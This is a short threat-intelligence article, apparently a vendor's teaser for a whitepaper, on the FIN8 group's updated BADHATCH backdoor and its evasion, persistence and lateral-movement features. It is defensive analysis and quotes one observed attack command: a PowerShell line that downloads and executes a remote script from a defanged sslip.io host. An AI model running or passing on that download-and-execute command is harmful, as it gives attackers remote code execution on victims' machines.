FIN8 Returns with Improved BADHATCH Toolkit

Foreword

In January 2016, a new financially motivated threat actor group made its debut. Dubbed FIN8, this group is known to have used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems.

The FIN8 group uses, among other tools, a fully featured backdoor called BADHATCH, first documented by GIGAMON in 2019. Bitdefender researchers have been closely monitoring development of the BADHATCH tool and discovered that newly deployed versions can ensure persistence, gather information about the victim’s network and allow lateral movement to explore more computers to find valuable information.

Since 2019, FIN8 has been constantly improving malware capabilities with new features such as screen capturing, proxy tunneling, fileless execution and more.

Our analysis reveals several differences between three deployed BADHATCH versions and to isolate the differences between versions, which helps us pinpoint campaigns on a timeline.

Key Findings

• The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success. Bitdefender has just uncovered a series of improvements to the BADHATCH backdoor aiming to improve persistence and data collection (grabbing screenshots and file uploads)
• The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques.
• The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands.
• “Living off the land attacks” call for additional defenses to complement behavioral- and commandline detection. Endpoint Detection and Remediation increases the chances of blocking and alerting as soon as the malware attempts discovery and lateral movement.

Dissecting the latest version of the BADHATCH malware

This section provides technical details about the latest version of BADHATCH malware, which is currently v2.14. The command line that caught our attention is “powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient). DownloadString(‘https://192-129-189-73[.]sslip[.]io/ yo’)”. It abuses sslip.io – a service that provides free SSL certificates to encrypt traffic. While the service is legitimate and widely used, the malware abuses it in an attempt at evading detection.

Download the whitepaper to find more.